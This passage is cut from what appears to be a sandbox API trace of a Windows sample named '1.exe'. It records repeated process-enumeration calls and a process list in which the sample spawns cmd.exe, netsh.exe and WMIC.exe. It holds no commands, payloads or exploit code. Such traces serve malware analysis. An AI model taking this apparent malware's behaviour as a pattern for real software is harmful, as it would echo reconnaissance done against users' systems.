lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.084] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0142.084] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0142.085] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.086] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0142.086] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.087] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0142.088] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0142.088] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0142.089] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0142.089] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0142.090] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.091] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.091] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0142.092] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.092] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.093] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.094] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.094] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.095] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.096] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.096] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.097] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.098] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.098] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0142.099] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.099] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0142.100] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0142.101] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.101] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0142.102] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0142.102] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0142.103] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0142.104] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0142.104] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0142.105] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0142.106] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0142.106] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0142.107] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0142.107] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0142.108] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0142.109] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0142.109] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0142.110] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0142.391] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0142.400] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0142.401] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0142.401] CloseHandle (hObject=0x2f8) returned 1 [0142.401] Sleep (dwMilliseconds=0x1f4) [0143.204] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2fc [0143.208] Process32FirstW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.209] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.210] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.210] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.211] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.212] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.212] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.213] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.213] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.214] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0143.215] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0143.215] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.216] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.216] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.217] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.218] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.218] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.219] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.219] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.220] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.221] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.221] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.222] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.223] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.223] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.224] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.224] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.225] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0143.226] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.226] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0143.227] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0143.227] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0143.228] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0143.229] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: 